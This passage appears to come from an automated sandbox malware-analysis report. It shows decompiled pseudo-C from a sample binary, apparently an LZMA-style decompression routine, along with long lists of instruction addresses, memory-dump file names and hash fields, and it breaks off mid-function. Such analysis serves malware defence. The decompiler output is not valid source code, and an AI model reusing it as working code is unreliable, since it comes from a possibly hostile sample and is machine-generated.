													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                          0x00000000
                          0x00406409
                          0x00406409
                          0x0040640d
                          0x0040641a
                          0x00406424
                          0x00000000
                          0x0040640f
                          0x0040640f
                          0x0040644a
                          0x0040644d
                          0x00406450
                          0x00406453
                          0x00406453
                          0x00406456
                          0x0040645d
                          0x00406462
                          0x00406343
                          0x00406346
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x004066bb
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x00000000
                          0x00000000
                          0x00406709
                          0x0040670d
                          0x004068bc
                          0x004068d2
                          0x004068da
                          0x004068e1
                          0x004068e3
                          0x004068ea
                          0x004068ee
                          0x004068ee
                          0x00406719
                          0x00406720
                          0x00406728
                          0x0040672b
                          0x0040672e
                          0x0040672e
                          0x00406734
                          0x00406734
                          0x00405ed0
                          0x00405ed0
                          0x00405ed0
                          0x00405ed9
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x00000000
                          0x00405eea
                          0x00000000
                          0x00000000
                          0x00405ef3
                          0x00405ef6
                          0x00405ef9
                          0x00405efd
                          0x00000000
                          0x00000000
                          0x00405f03
                          0x00405f06
                          0x00405f08
                          0x00405f09
                          0x00405f0c
                          0x00405f0e
                          0x00405f0f
                          0x00405f11
                          0x00405f14
                          0x00405f19
                          0x00405f1e
                          0x00405f27
                          0x00405f3a
                          0x00405f3d
                          0x00405f49
                          0x00405f71
                          0x00405f73
                          0x00405f81
                          0x00405f81
                          0x00405f85
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405f75
                          0x00405f75
                          0x00405f78
                          0x00405f79
                          0x00405f79
                          0x00000000
                          0x00405f75
                          0x00405f4f
                          0x00405f54
                          0x00405f54
                          0x00405f5d
                          0x00405f65
                          0x00405f68
                          0x00000000
                          0x00405f6e
                          0x00405f6e
                          0x00000000
                          0x00405f6e
                          0x00000000
                          0x00405f8b
                          0x00405f8b
                          0x00405f8f
                          0x0040683b
                          0x00000000
                          0x0040683b
                          0x00405f98
                          0x00405fa8
                          0x00405fab
                          0x00405fae
                          0x00405fae
                          0x00405fae
                          0x00405fb1
                          0x00405fb5
                          0x00000000
                          0x00000000
                          0x00405fb7
                          0x00405fbd
                          0x00405fe7
                          0x00405fed
                          0x00405ff4
                          0x00000000
                          0x00405ff4
                          0x00405fc3
                          0x00405fc6
                          0x00405fcb
                          0x00405fcb
                          0x00405fd6
                          0x00405fde
                          0x00405fe1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406026
                          0x0040602c
                          0x0040602f
                          0x0040603c
                          0x00406044
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x00000000
                          0x00405ffb
                          0x00405ffb
                          0x00405fff
                          0x0040684a
                          0x00000000
                          0x0040684a
                          0x0040600b
                          0x00406016
                          0x00406016
                          0x00406016
                          0x00406019
                          0x0040601c
                          0x0040601f
                          0x00406024
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040604c
                          0x0040604e
                          0x00406051
                          0x004060c2
                          0x004060c5
                          0x004060c8
                          0x004060cf
                          0x004060d9
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x004066b8
                          0x00406053
                          0x00406057
                          0x0040605a
                          0x0040605c
                          0x0040605f
                          0x00406062
                          0x00406064
                          0x00406067
                          0x00406069
                          0x0040606e
                          0x00406071
                          0x00406074
                          0x00406078
                          0x0040607f
                          0x00406082
                          0x00406089
                          0x0040608d
                          0x00406095
                          0x00406095
                          0x00406095
                          0x0040608f
                          0x0040608f
                          0x0040608f
                          0x00406084
                          0x00406084
                          0x00406084
                          0x00406099
                          0x0040609c
                          0x004060ba
                          0x004060bc
                          0x00000000
                          0x0040609e
                          0x0040609e
                          0x004060a1
                          0x004060a4
                          0x004060a7
                          0x004060a9
                          0x004060a9
                          0x004060a9
                          0x004060ac
                          0x004060af
                          0x004060b1
                          0x004060b2
                          0x004060b5
                          0x00000000
                          0x004060b5
                          0x00000000
                          0x004062eb
                          0x004062ef
                          0x0040630d
                          0x00406310
                          0x00406317
                          0x0040631a
                          0x0040631d
                          0x00406320
                          0x00406323
                          0x00406326
                          0x00406328
                          0x0040632f
                          0x00406330
                          0x00406332
                          0x00406335
                          0x00406338
                          0x0040633b
                          0x0040633b
                          0x00406340
                          0x00000000
                          0x00406340
                          0x004062f1
                          0x004062f4
                          0x004062f7
                          0x00406301
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00000000
                          0x00406355
                          0x00406359
                          0x0040637c
                          0x0040637f
                          0x00406382
                          0x0040638c
                          0x0040635b
                          0x0040635b
                          0x0040635e
                          0x00406361
                          0x00406364
                          0x00406371
                          0x00406374
                          0x00406374
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00000000
                          0x00406398
                          0x0040639c
                          0x00000000
                          0x00000000
                          0x004063a2
                          0x004063a6
                          0x00000000
                          0x00000000
                          0x004063ac
                          0x004063ae
                          0x004063b2
                          0x004063b2
                          0x004063b5
                          0x004063b9
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406430
                          0x00406434
                          0x0040643b
                          0x0040643e
                          0x00406441
                          0x00406436
                          0x00406436
                          0x00406436
                          0x00406444
                          0x00406447
                          0x00000000
                          0x00000000
                          0x004064f0
                          0x004064f0
                          0x004064f4
                          0x00406892
                          0x00000000
                          0x00406892
                          0x004064fa
                          0x004064fd
                          0x00406500
                          0x00406504
                          0x00406507
                          0x0040650d
                          0x0040650f
                          0x0040650f
                          0x0040650f
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00000000
                          0x004060e5
                          0x004060e5
                          0x004060e9
                          0x00406856
                          0x00000000
                          0x00406856
                          0x004060ef
                          0x004060f2
                          0x004060f5
                          0x004060f9
                          0x004060fc
                          0x00406102
                          0x00406104
                          0x00406104
                          0x00406104
                          0x00406107
                          0x0040610a
                          0x0040610a
                          0x0040610d
                          0x00406110
                          0x00000000
                          0x00000000
                          0x00406116
                          0x0040611c
                          0x00000000
                          0x00000000
                          0x00406122
                          0x00406122
                          0x00406126
                          0x00406129
                          0x0040612c
                          0x0040612f
                          0x00406132
                          0x00406133
                          0x00406136
                          0x00406138
                          0x0040613e
                          0x00406141
                          0x00406144
                          0x00406147
                          0x0040614a
                          0x0040614d
                          0x00406150
                          0x0040616c
                          0x0040616f
                          0x00406172
                          0x00406175
                          0x0040617c
                          0x00406180
                          0x00406182
                          0x00406186
                          0x00406152
                          0x00406152
                          0x00406156
                          0x0040615e
                          0x00406163
                          0x00406165
                          0x00406167
                          0x00406167
                          0x00406189
                          0x00406190
                          0x00406193
                          0x00000000
                          0x00406199
                          0x00000000
                          0x00406199
                          0x00000000
                          0x0040619e
                          0x0040619e
                          0x004061a2
                          0x00406862
                          0x00000000
                          0x00406862
                          0x004061a8
                          0x004061ab
                          0x004061ae
                          0x004061b2
                          0x004061b5
                          0x004061bb
                          0x004061bd
                          0x004061bd
                          0x004061bd
                          0x004061c0
                          0x004061c3
                          0x004061c3
                          0x004061c3
                          0x004061c9
                          0x00000000
                          0x00000000
                          0x004061cb
                          0x004061ce
                          0x004061d1
                          0x004061d4
                          0x004061d7
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e3
                          0x004061e6
                          0x004061e9
                          0x00406201
                          0x00406204
                          0x00406207
                          0x0040620a
                          0x0040620a
                          0x0040620d
                          0x00406211
                          0x00406213
                          0x004061eb
                          0x004061eb
                          0x004061f3
                          0x004061f8
                          0x004061fa
                          0x004061fc
                          0x004061fc
                          0x00406216
                          0x0040621d
                          0x00406220
                          0x00000000
                          0x00406222
                          0x00000000
                          0x00406222
                          0x00406220
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00000000
                          0x00000000
                          0x00406262
                          0x00406262
                          0x00406266
                          0x0040686e
                          0x00000000
                          0x0040686e
                          0x0040626c
                          0x0040626f
                          0x00406272
                          0x00406276
                          0x00406279
                          0x0040627f
                          0x00406281
                          0x00406281
                          0x00406281
                          0x00406284
                          0x00406287
                          0x00406287
                          0x0040628d
                          0x0040622b
                          0x0040622b
                          0x0040622e
                          0x00000000
                          0x0040622e
                          0x0040628f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406298
                          0x0040629b
                          0x0040629e
                          0x004062a1
                          0x004062a4
                          0x004062a7
                          0x004062aa
                          0x004062ad
                          0x004062c5
                          0x004062c8
                          0x004062cb
                          0x004062ce
                          0x004062ce
                          0x004062d1
                          0x004062d5
                          0x004062d7
                          0x004062af
                          0x004062af
                          0x004062b7
                          0x004062bc
                          0x004062be
                          0x004062c0
                          0x004062c0
                          0x004062da
                          0x004062e1
                          0x004062e4
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x00406573
                          0x00406573
                          0x00406577
                          0x0040689e
                          0x00000000
                          0x0040689e
                          0x0040657d
                          0x00406580
                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406682
                          0x00406686
                          0x004066a8
                          0x004066ab
                          0x004066b5
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x004066b8
                          0x00406688
                          0x0040668b
                          0x0040668f
                          0x00406692
                          0x00406692
                          0x00406695
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00406776
                          0x00406776
                          0x00000000
                          0x00406776
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406833
                          0x00406734
                          0x00000000
                          0x00000000
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00406481
                          0x00406484
                          0x00406487
                          0x00406489
                          0x0040648b
                          0x0040648b
                          0x0040648c
                          0x0040648f
                          0x00406496
                          0x00406499
                          0x004064a7
                          0x00000000
                          0x00000000
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x00000000
                          0x0040678c
                          0x0040678c
                          0x00406790
                          0x004068c8
                          0x00000000
                          0x004068c8
                          0x00406796
                          0x00406799
                          0x0040679c
                          0x004067a0
                          0x004067a3
                          0x004067a9
                          0x004067ab
                          0x004067ab
                          0x004067ab
                          0x004067ae
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b4
                          0x004067b4
                          0x004067b8
                          0x00406818
                          0x0040681b
                          0x00406820
                          0x00406821
                          0x00406823
                          0x00406825
                          0x00406828
                          0x00406734
                          0x00406734
                          0x00000000
                          0x0040673a
                          0x00406734
                          0x004067ba
                          0x004067c0
                          0x004067c3
                          0x004067c6
                          0x004067c9
                          0x004067cc
                          0x004067cf
                          0x004067d2
                          0x004067d5
                          0x004067d8
                          0x004067db
                          0x004067f4
                          0x004067f7
                          0x004067fa
                          0x004067fd
                          0x00406801
                          0x00406803
                          0x00406803
                          0x00406804
                          0x00406807
                          0x004067dd
                          0x004067dd
                          0x004067e5
                          0x004067ea
                          0x004067ec
                          0x004067ef
                          0x004067ef
                          0x0040680a
                          0x00406811
                          0x00000000
                          0x00406813
                          0x00000000
                          0x00406813
                          0x00000000
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040667b
                          0x004068b0
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x004068e7
                          0x004068e7
                          0x00000000
                          0x004068e7
                          0x00406734
                          0x004066bb
                          0x004066b8
                          0x00000000
                          0x0040640d

                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                          • Instruction ID: b59dca7a73cfed8a049a6b6a8b4acb584d685fa01604791ee1d6e054a78b3619
                          • Opcode Fuzzy Hash: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                          • Instruction Fuzzy Hash: 08714671D04229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7789996DF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00406355 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                          Download Yara Rule
                          C-Code - Quality: 98%
                          			E00406355() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
